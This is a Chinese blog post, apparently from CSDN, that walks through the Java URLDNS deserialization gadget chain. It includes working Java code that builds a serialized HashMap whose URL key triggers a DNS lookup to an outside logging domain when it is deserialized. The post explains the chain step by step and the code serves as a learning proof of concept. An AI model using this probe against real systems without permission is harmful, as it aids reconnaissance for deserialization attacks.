Java安全——URLDNS利用链

最新推荐文章于 2024-05-16 10:23:10 发布
最新推荐文章于 2024-05-16 10:23:10 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Java安全 文章标签: java 安全 jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51663706/article/details/126728273
版权

URLDNS利用链

前言

简而言之,URLDNS也就是 当HashMap的key传入为URL类型对象的话,这个URL对象就会执行URL类的hashCode()方法 ,从而触发DNS请求,通常用来探测是否存在反序列化漏洞

两条链子简介

URL类-->hashCode()方法-->1.hashcode=!-1-->不执行DNS解析
                     -->2.hashcode=-1-->handler.hashCode()(hander为URLStreamHandler类对
                          象)-->getHostAddress(u)-->getByName(host)-->做一次DNS解析
HashMap-->put(k,v)-->putVal()-->hash(k)-->k.hashCode()

HashMap链子

打开HashMap源码,有个put(k,v)方法,用来传参,它会返回一个hash(key)
在这里插入图片描述
查看hash()方法,它会返回一个hashCode()方法
在这里插入图片描述

URL链子

查看URL类源码,它也有一个hashCode()方法,所以当上述HashMap传入的key为URL对象,就会执行URL的hashCode()方法
在这里插入图片描述
在该类中默认的hashCode值为-1,也就是默认执行handler.hashCode
在这里插入图片描述
hander为URLStreamHandler类对象,hander对象的方法hashCode()下, 有getHostAddress(u)方法
在这里插入图片描述
进一步查看getHostAddress(),看到有getByName(host)方法,因此就会在这块进行传值并DNS解析
在这里插入图片描述

代码

import java.io.*;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;

public class UrlDns {
    public static void main(String[] args) throws MalformedURLException, IllegalAccessException, NoSuchFieldException {
        /**
         *
         * URL类-->hashCode()方法-->1.hashcode=!-1-->不执行DNS解析
         *                      -->2.hashcode=-1-->handler.hashCode()(hander为URLStreamHandler类对
         *                          象)-->getHostAddress(u)-->getByName(host)-->做一次DNS解析
         * HashMap类-->put(k,v)-->putVal()-->hash(k)-->k.hashCode()
         * HashMap类
         * 当HashMap的key传入为Url类型的话,k.hashCode()就会执行URL类的hashCode方法
         * hashCode对象默认为-1,也就是说传入的url会默认执行一次解析,为了验证是否存在反序列化存在,需要在反序列化之前不执行dns解析,
         * 因此需要通过反射将hashCode的v改为其他,再执行序列化与反序列化操作
         */
        HashMap<URL, Integer> hashmap = new HashMap<>();

        URL url = new URL("http://11e0086a.dns.1433.eu.org");

        Class urlClass = url.getClass();
        Field field = urlClass.getDeclaredField("hashCode");//得到URL类的hashCode字段(默认为-1)
        //getDeclaredFields:获取当前类的所有字段,包括 protected/默认/private 修饰的字段;不包括父类public 修饰的字段。

        field.setAccessible(true);
        field.set(url,3);//设置url的hashCode值为3

        hashmap.put(url,1);//

        field.set(url,-1);
        // int hashCode = url.hashCode();


        try{
            //序列化
            FileOutputStream fileOutputStream = new FileOutputStream("a.ser");
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
            objectOutputStream.writeObject(hashmap);
            objectOutputStream.close();
            fileOutputStream.close();

            //反序列化
            FileInputStream fileInputStream = new FileInputStream("a.ser");
            ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
            objectInputStream.readObject();
            objectInputStream.close();
            fileInputStream.close();

        } catch (FileNotFoundException e) {
            throw new RuntimeException(e);
        } catch (IOException e) {
            throw new RuntimeException(e);
        } catch (ClassNotFoundException e) {
            throw new RuntimeException(e);
        }


    }




}

调试分析过程

利用反射将url的hashCode设置不为-1,这样就不会在序列化之前解析
在这里插入图片描述
继续跟进,可以看到不进行解析
在这里插入图片描述

继续跟进
在这里插入图片描述

onlyIfAbsent–>说明只能进行一次解析,如果不修改hashCode的值 put在传值url的时候会默认进行dns解析

再通过反射设置field.set(url,-1),hashCode的值为-1,下次在执行序列化与反序列化的操作时候就会判断是否解析
在这里插入图片描述
接下来进行序列化操作,可以看到在进行反序列化执行readObject()之前都没有解析
在这里插入图片描述

在readObject()执行后,DNS进行了解析,也就验证了存在反序列化漏洞
在这里插入图片描述

Remix_272
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java————————进阶
05-04
适合复习java进阶
Java 基础 —— 五阶段
05-02
Java 基础 —— 五阶段
URLDNS分析
Demodd的博客
03-16 2249
前言 ​ 之前学URLDNS的时候学的迷迷糊糊的,昨天学到shiro发现可以用URLDNS探测shiro反序列化是否存在,所以今天心血来潮又跟了一遍URLDNS,虽然之前跟了一遍但是这次收获颇多。 复现 反序列化入口在HashMap类的readObject,先看readObject方法 private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException { // Rea
dnsurl
lylong0703的博客
02-13 166
urldns
Java反序列化之URLDNS
m0_62466350的博客
05-28 698
URLDNSjava原生态的一条利用,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用,只能发起DNS请求,并不能进行其他利用这条路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
6-java安全——java反序列化漏洞利用
网络安全
07-01 3851
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
java-URLDNS分析
qq_62613905的博客
01-29 327
URLDNS分析
JAVA URLDNS分析利用
qq_63676207的博客
09-14 126
调用hash(key)方法,此时也会判断key的hashMap,如果是-1则会触发一次dns请求所以假设我们可以控制hashCode的值当初次进行hashmap.put(url,1);时我们将其改为其他值,hashmap.put(url,1)后再将其改回**-1** 这样就可通过DNS判断是否反序列化.这个需要引入Java中的反射的知识。通过反射,可以在运行时获取类的信息,如类的名称、父类、接口、字段、方法等,并且可以通过反射的API来动态地创建对象、调用方法、访问和修改字段等。发现和我们设想的较为一致.
java毕业设计——百货中心供应管理系统(论文+源代码+数据库+讲解视频).zip
05-29
java毕业设计——百货中心供应管理系统(论文+源代码+数据库+讲解视频).zip java毕业设计——百货中心供应管理系统(论文+源代码+数据库+讲解视频).zip java毕业设计——百货中心供应管理系统(论文+源代码+...
java基础——入门篇
07-14
因为在jdk下bin文件夹中有很多我们在开发中要使用的工具如javaexejavacexejarex等那么我们在使用时想要在电脑的任意位置下使用这些java开发工具那么我们就需有把这些工具所在的路径配置到系统的环境变量中当我们使用...
java毕业设计——百货中心供应管理系统的设计与实现(论文+答辩PPT+源代码+数据库).zip
05-29
java毕业设计——百货中心供应管理系统的设计与实现(论文+答辩PPT+源代码+数据库).zip java毕业设计——百货中心供应管理系统的设计与实现(论文+答辩PPT+源代码+数据库).zip java毕业设计——百货中心供应管理...
java毕业设计——基于java安全电子商务系统的的设计与实现.zip
05-29
java毕业设计——基于java安全电子商务系统的的设计与实现.zipjava毕业设计——基于java安全电子商务系统的的设计与实现.zipjava毕业设计——基于java安全电子商务系统的的设计与实现.zip java毕业设计——...
Java反序列化1-URLDNS利用分析
weixin_43263451的博客
06-26 1119
之前一段时间一直在学习了java,也有刷过一段时间的java靶场。最近想着也应该开始学习java反序列化相关知识了,今天就从java反序列化中最简单的URLDNS开始分析URLDNS不需要依赖第三方的包,同时不限制jdk的版本URLDNS并不能执行命令,只能发送DNS请求该条基本没什么危害,通常做为检测反序列化的入口点使用序列化 反序列化 上面就是java序列化与反序列化一个简单的例子。java的序列化与反序列化所使用的函数时writeObject和readObject,java也允许开发者去自己定义
Java 反序列化URLDNS利用 调试分析
wsitcj的博客
03-10 1165
事前准备 他的利用 * Gadget Chain: * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode() 生成payload: java -jar ysoserial.jar URLDNS http://xxx.ceye.io >out.bin java -jar ysoserial.jar URLDNS http://kjo3
认识 Java 中的 URL
大鹏的博客
11-16 1973
URL 即 Uniform Resource Locator,翻译为中文为统一资源定位符,表示万维网上的一个资源,资源可以是实际存在的一个文件,也可以是抽象的数据库的查询结果。
java 暴露 url 安全_[Java教程]URL安全问题(过滤器)
weixin_42507297的博客
02-26 533
[Java教程]URL安全问题(过滤器)0 2014-04-08 16:00:14在做一个java web 应用的时候,经常要涉及到三个URL安全问题:1、没有登录,直接输入对应的URL就可以进入页面;2、权限问题,普通用户也可以进入管理员的页面,没有权限限制。3、seesion失效时,刷新会错误。4、防止用户从其他网站url直接连接进入我网站的某个资源,或者某些页面要求必须从某个...
java https安全传输
mmdev
09-14 141
HttpsURLConnection 扩展 HttpURLConnection,支持各种特定于 https 功能。此类使用 HostnameVerifier 和 SSLSocketFactory。为这两个类都定义了默认实现。但是,可以根据每个类(静态的)或每个实例来替换该实现。所有新 HttpsURLConnection 实例在创建时将被分配“默认的”静态值,通过在连接前调用每个实例适当的 set...
jar包增量更新分析
最新发布
junlaiyan的专栏
05-16 281
借助jdeps分析出jar包的增量文件
java反序列化利用
04-29
Java反序列化利用是指黑客利用Java反序列化漏洞,通过构造恶意的序列化数据,将恶意代码注入目标系统,从而实现攻击的手段。Java反序列化漏洞可能带来很大的风险,因为黑客可以利用它来实现各种攻击,比如代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值